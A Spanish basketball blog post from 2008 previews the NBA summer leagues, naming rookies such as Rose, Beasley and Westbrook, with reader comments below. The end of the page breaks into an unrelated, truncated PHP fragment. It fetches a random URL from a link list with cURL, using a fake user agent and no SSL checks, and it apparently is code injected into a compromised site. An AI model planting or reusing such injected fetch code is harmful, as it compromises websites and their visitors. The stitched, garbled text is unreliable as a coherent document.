Summertime: Comienzan las ligas de verano

07 de July de 2008 por Dantley

rosebeasleyComienzan hoy, 7 de julio, las ligas de verano de la NBA. Su utilidad es cuestionable, pero el buen aficionado siempre encontrará algo atractivo en esta primera toma de contacto de los nuevos rookies con la NBA. En realidad, no se trata más que de abrir lo que podríamos llamar “melones por catar”, pero a buen seguro que es una nueva oportunidad para calibrar lo que podremos esperar de algunas futuras estrellas de la liga profesional.

No debemos caer en la tentación de creer que una buena actuación en las ligas de verano asegura un año de éxitos. Por citar uno de los ejemplos más claros, el año pasado Marco Belinelli brilló con luz propia anotando 37 puntos en su primer partido. A partir de ahí todo le fue cuesta abajo y acabó el año incluso perdiendo el derecho a jugar los minutos de la basura con los Warriors. Sin embargo, sí es cierto que para algunos rookies, e incluso para sophomores (jugadores de segundo año) es la oportunidad para demostrar que van a dar el máximo por colarse en las rotaciones de sus equipos. Sin ir más lejos, en las ligas de 2007 destacaron sobremanera novatos como Stuckey (que maravilló a los que dudaban de él por provenir de una universidad pequeña), Aaron Brooks, D.J. Strawberry y Jared Dudley, así como veteranos como Lamarcus Aldridge, Paul Millsap, Nate Robinson, Kelenna Azubuike y Juan José Barea.

En 2008 tendremos tres ligas de verano, una vez desaparecida la Summer Pro League de California, donde jugadores como Magic Johnson, Kobe Bryant y Andrew Bynum tuvieron oportunidad de jugar, pero que ya en los últimos años había perdido todo su nivel permitiendo a jugadores como Bo Outlaw dominar los partidos.

bannersl

En orden cronológico, entre el 7 y el 11 de julio se va a disputar la Orlando Pro Summer League con 6 equipos NBA. Tras un Indiana – Oklahoma City (que hace su debut como franquicia en su nueva ciudad) no podrían comenzar las ligas de manera más explosiva que con un enfrentamiento entre Miami y Chicago – aproximadamente a las 23:30 hora española-, o lo que es lo mismo, entre Derrick Rose y Michael Beasley, si bien ambos tienen alguna molestia física que quizá haga aconsejable cierta prudencia en los esfuerzos. Los partidos se podrán seguir en directo en la web de los Orlando Magic. Entre los nombres interesantes para seguir figuran Rose, Beasley, Westbrook, Brook López, Courtney Lee, Ryan Anderson o Chris Douglas-Roberts, además de veteranos como Tyrus Thomas, Joakim Noah, Jeff Green y Sean Williams. Completan los rosters un sinnúmero de jugadores no drafteados que buscan la oportunidad de conseguir un contrato, como Josh Duncan y Pat Calathes.

La gran liga de verano, por volumen de equipos y partidos, se celebrará en Las Vegas entre el 11 y el 20 de julio. Nada menos que 21 equipos NBA estarán representados. Aún están pendientes de confirmación los jugadores participantes, pero ya son seguros grandes nombres del draft 2008 como O.J. Mayo, Kevin Love, Danilo Gallinari, Eric Gordon, D.J. Augustine y Joe Alexander. Realmente el equipo ganador no dejará de ser una anécdota, pero Detroit se perfila como uno de los favoritos con un elenco de jugadores entre los que figuran Arron Afflalo, Amir Johnson, Rodney Stuckey y el exazulgrana Alex Acker. Los partidos podrán seguirse en http://www.nba.com/summerleague2008/

Finalmente, la tradicional Rocky Mountain Revue se disputará un año más en Utah entre el 18 y el 25 de julio con la participación de 8 equipos NBA a los que acompañarán una selección de la D-League y el exotismo del campeón asiático, la selección de Irán.

Comenta

6 comentarios a esta entrada

  1. Noelinho dice:
    #1

    No tiene precio ver los partidos de la summer League de Orlando que retrasmiten desde una webcam. Por cierto Dantley, podrías haber nombrado que Redick fue MVP de la del año pasado :p

      Citar

  2. MagicJohnson32 dice:
    #2

    Eso, Noe, tú resta aún más valor a las Summerleagues :p)

      Citar

  3. Noelinho dice:
    #3

    Que sepas que te odio, jajajajajajja

      Citar

  4. planetbasket.net dice:
    #4
  5. Dantley dice:
    #5

    Redick, Sefolosha, Tyrus Thomas, hasta Martin Gortat tuvieron buenas actuaciones en la de Orlando.

    Lo malo para Redick es que afronta la liga que empieza hoy como una de las pocas oportunidades para demostrar que merece más minutos. El que no he visto en el roster es a Lee con el que igual Redick acaba peleando los minutos

    Por cierto, en Orlando otro viejo conocido, Gaines del Joventut.

      Citar

  6. Dantley dice:
    #6

    Pues no empieza mal. Exhibición de Beasley que aunque abusando del tiro, se fue a 28 puntos. Rose estuvo algo perdido aunque para un base puede ser más normal al ser la primera vez que juega con esos compañeros y también porque Chalmers, al menos en la parte que vi, lo defendió muy bien.

    En el resto de partidos destacó entre los novatos Russell Westbrook por Seatt.. que diga, por Oklahoma, haciendo un poco de todo. Igual nos estamos equivocando con él, aunque el partido fue para Indiana. También destacó Jaycee Carroll en New Jersey, un desconocido no drafteado de 25 años, letal en el tiro, estilo Redick pero que no pasará de ser un buen especialista si se va a Europa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>